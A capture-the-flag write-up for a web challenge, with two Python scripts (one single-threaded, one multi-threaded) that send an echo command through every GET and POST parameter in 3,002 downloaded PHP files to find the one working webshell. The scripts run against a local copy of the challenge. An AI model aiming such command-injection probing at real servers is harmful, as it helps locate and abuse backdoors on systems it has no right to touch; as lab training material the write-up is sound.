BUUCTF WEB [strong network Cup 2019] clever hackers
Open the web page; a hint at the bottom points to the source code.
Downloading the source code yields 3002 files, and a quick look shows that many of them appear to contain shells.
Most of them are not actually usable, though. The point of this challenge is to find the shell that really works, so what it tests is the ability to write a script.
With the source downloaded, set it up in a local environment using PHP 7.0 or later; otherwise it reports a syntax error.
Then write a script (it runs very slowly):
import requests
import sys
import os
# Base URL of the local server that hosts the downloaded source.
url = "http://127.0.0.1/src/"
# Directory listing of the downloaded source; each entry is probed in turn.
source_dir = "C://Users//Administrator//Desktop//www//src"
files = os.listdir(source_dir)
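def GetGet(file, src_dir="C://Users//Administrator//Desktop//www//src"):
    """Collect the ``$_GET['...']`` parameter names used in one PHP source file.

    Args:
        file: File name relative to ``src_dir``.
        src_dir: Directory holding the downloaded source. Defaults to the
            path the script was written for.

    Returns:
        A list with one name per matching line, in file order. Only the
        first ``$_GET['`` on a line is considered.
    """
    marker = "$_GET['"
    names = []
    # The context manager closes the handle; errors="replace" keeps a single
    # undecodable byte from aborting the scan.
    with open(os.path.join(src_dir, file), "r", errors="replace") as handle:
        for line in handle:
            hit = line.find(marker)
            if hit == -1:  # the old "> 0" test skipped a match at column 0
                continue
            start = hit + len(marker)
            end = line.find("'", start)
            if end == -1:
                # No closing quote on this line, so there is no usable name.
                continue
            names.append(line[start:end])
    return names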
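def GetPost(file, src_dir="C://Users//Administrator//Desktop//www//src"):
    """Collect the ``$_POST['...']`` parameter names used in one PHP source file.

    Args:
        file: File name relative to ``src_dir``.
        src_dir: Directory holding the downloaded source. Defaults to the
            path the script was written for.

    Returns:
        A list with one name per matching line, in file order. Only the
        first ``$_POST['`` on a line is considered.
    """
    marker = "$_POST['"
    names = []
    # The context manager closes the handle; errors="replace" keeps a single
    # undecodable byte from aborting the scan.
    with open(os.path.join(src_dir, file), "r", errors="replace") as handle:
        for line in handle:
            hit = line.find(marker)
            if hit == -1:  # the old "> 0" test skipped a match at column 0
                continue
            start = hit + len(marker)
            end = line.find("'", start)
            if end == -1:
                # No closing quote on this line, so there is no usable name.
                continue
            names.append(line[start:end])
    return names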
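def Send():
    """Probe every file in ``files`` on the local server, one request per parameter.

    For each file, the names returned by ``GetGet`` are sent as query-string
    parameters and the names returned by ``GetPost`` as form fields, each
    carrying an ``echo`` command. A response containing ``Success`` is printed
    and ends that file's GET or POST loop.

    A page that merely reflects the parameter value also contains the marker,
    so a reported hit still has to be confirmed by hand.
    """
    timeout = 10  # seconds; without a limit one hanging page stalls the whole run

    for name in files:
        get = GetGet(name)
        print("Try filename: %s"%name)
        for param in get:
            NewUrl = url+"%s?%s=%s"%(name,param,'echo "Success!!!"')
            try:
                reply = requests.get(NewUrl, timeout=timeout)
            except requests.RequestException as err:
                # One failed request must not abort the scan of the other files.
                print("Request failed: %s (%s)" % (NewUrl, err))
                continue
            if "Success" in reply.text:
                print("Success! Get:%s" % (param))
                break

        post = GetPost(name)
        NewUrl = url+"%s"%(name)
        for param in post:
            try:
                reply = requests.post(NewUrl, data={param:"echo 'Success!!'"}, timeout=timeout)
            except requests.RequestException as err:
                print("Request failed: %s (%s)" % (NewUrl, err))
                continue
            if "Success" in reply.text:
                print("Success! Post:%s" % (param))
                break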
# Start the sequential scan; requests go to the local server configured in `url`.
Send()
This script is terrible: it would probably take a whole day to run. I am too much of a beginner, so I gave up on this version.
But why not make it multi-threaded? I found some Python 3 multi-threading code and adapted it a little:
import requests
import sys
import os
import threading
import time
# Base URL of the local server that hosts the downloaded source.
url = "http://127.0.0.1/src/"
# Directory listing of the downloaded source; worker threads index into it.
source_dir = "C://Users//Administrator//Desktop//www//src"
files = os.listdir(source_dir)
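def GetGet(file, src_dir="C://Users//Administrator//Desktop//www//src"):
    """Collect the ``$_GET['...']`` parameter names used in one PHP source file.

    Args:
        file: File name relative to ``src_dir``.
        src_dir: Directory holding the downloaded source. Defaults to the
            path the script was written for.

    Returns:
        A list with one name per matching line, in file order. Only the
        first ``$_GET['`` on a line is considered.
    """
    marker = "$_GET['"
    names = []
    # The context manager closes the handle, which matters when many threads
    # read files at once; errors="replace" keeps a single undecodable byte
    # from killing a worker.
    with open(os.path.join(src_dir, file), "r", errors="replace") as handle:
        for line in handle:
            hit = line.find(marker)
            if hit == -1:  # the old "> 0" test skipped a match at column 0
                continue
            start = hit + len(marker)
            end = line.find("'", start)
            if end == -1:
                # No closing quote on this line, so there is no usable name.
                continue
            names.append(line[start:end])
    return names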
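def GetPost(file, src_dir="C://Users//Administrator//Desktop//www//src"):
    """Collect the ``$_POST['...']`` parameter names used in one PHP source file.

    Args:
        file: File name relative to ``src_dir``.
        src_dir: Directory holding the downloaded source. Defaults to the
            path the script was written for.

    Returns:
        A list with one name per matching line, in file order. Only the
        first ``$_POST['`` on a line is considered.
    """
    marker = "$_POST['"
    names = []
    # The context manager closes the handle, which matters when many threads
    # read files at once; errors="replace" keeps a single undecodable byte
    # from killing a worker.
    with open(os.path.join(src_dir, file), "r", errors="replace") as handle:
        for line in handle:
            hit = line.find(marker)
            if hit == -1:  # the old "> 0" test skipped a match at column 0
                continue
            start = hit + len(marker)
            end = line.find("'", start)
            if end == -1:
                # No closing quote on this line, so there is no usable name.
                continue
            names.append(line[start:end])
    return names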
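def Send(start,end):
    """Probe the files at indexes ``start`` to ``end - 1`` of ``files``.

    Args:
        start: First index of the slice; anything ``int()`` accepts (the
            worker thread passes it as a string).
        end: Index one past the last file of the slice.

    For each file, the names returned by ``GetGet`` are sent as query-string
    parameters and the names returned by ``GetPost`` as form fields, each
    carrying an ``echo`` command. A response containing ``Success`` is printed
    and ends that file's GET or POST loop.

    A page that merely reflects the parameter value also contains the marker,
    so a reported hit still has to be confirmed by hand.
    """
    start = int(start)
    end = int(end)
    timeout = 10  # seconds; without a limit one hanging page blocks this worker

    # Slicing clamps to the list length, so a slice that runs past the last
    # file no longer raises IndexError.
    for name in files[start:end]:
        get = GetGet(name)
        print("Try filename: %s"%name)
        for param in get:
            NewUrl = url+"%s?%s=%s"%(name,param,'echo "Success!!!"')
            try:
                reply = requests.get(NewUrl, timeout=timeout)
            except requests.RequestException as err:
                # One failed request must not end this worker's whole slice.
                print("Request failed: %s (%s)" % (NewUrl, err))
                continue
            if "Success" in reply.text:
                print("Success! Url:%s" % (NewUrl))
                break

        post = GetPost(name)
        NewUrl = url+"%s"%(name)
        for param in post:
            try:
                reply = requests.post(NewUrl, data={param:"echo 'Success!!'"}, timeout=timeout)
            except requests.RequestException as err:
                print("Request failed: %s (%s)" % (NewUrl, err))
                continue
            if "Success" in reply.text:
                print("Success! Post:%s" % (param))
                break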
class myThread(threading.Thread):
    """Worker thread that hands one pair of slice bounds to ``Send``.

    ``name`` holds the first index of the slice and ``counter`` the index one
    past its end. ``threadID`` is stored but not read by ``run``.
    """

    def __init__(self, threadID, name, counter):
        super().__init__()
        # Thread.name keeps its value as a string, which is why Send() has to
        # convert the bound back with int().
        self.counter = counter
        self.name = name
        self.threadID = threadID

    def run(self):
        """Thread entry point: pass the stored bounds to Send()."""
        Send(self.name, self.counter)
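# Give each worker a slice of 20 file indexes. The slice count comes from
# len(files): the fixed range(0,150) only reached indexes 0-2999, so with the
# 3002 files mentioned in the write-up the last entries were never probed, and
# a shorter listing made Send() fail with IndexError.
chunk = 20
total = len(files)
for i, lo in enumerate(range(0, total, chunk)):
    thread = myThread(i, lo, min(lo + chunk, total))
    thread.start()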
After running for a little over 20 minutes, the script produced a result:
With that, go straight to command execution!
Finally we got the flag:
Even at best, the run time only came down to a little over 20 minutes.
If anyone knows a faster way, please let me know. I would be grateful!